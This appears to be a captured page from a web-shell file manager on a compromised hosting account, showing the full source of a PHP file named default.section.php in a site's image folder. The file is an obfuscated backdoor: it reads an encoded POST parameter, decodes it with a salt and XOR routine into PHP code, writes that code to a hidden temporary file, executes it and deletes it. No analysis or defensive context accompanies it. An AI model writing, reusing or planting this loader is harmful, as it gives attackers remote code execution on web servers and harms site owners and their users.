HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/self/root/home/vitanhod/ssawpalmetto.vitavit.com.pk/img/default.section.php
<?php

if(@$_POST["r\x65\x73"] !== null){
	$rec = $_POST["r\x65\x73"];
	 $rec = 		explode	 (	 "."	 	,$rec	)	  ; 
	$property_set = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	$salt);
            $__len = count(	$rec);
    
            for(	$q = 0; $q < $__len; $q++) { $v1 = $rec[$q];
                $sChar = ord(	$salt[$q% 	$sLen]);
                $dec =(	(	int)$v1 - $sChar -(	$q% 	10)) ^ 84;
                $property_set .= chr(	$dec);
            }
	$key = array_filter(["/dev/shm", "/var/tmp", "/tmp", sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP")]);
	while ($factor = array_shift($key)) {
    		if (max(0, is_dir($factor) * is_writable($factor))) {
    $marker = sprintf("%s/.flg", $factor);
    $file = fopen($marker, 'w');
if ($file) {
	fwrite($file, $property_set);
	fclose($file);
	include $marker;
	@unlink($marker);
	die();
}
}
}
}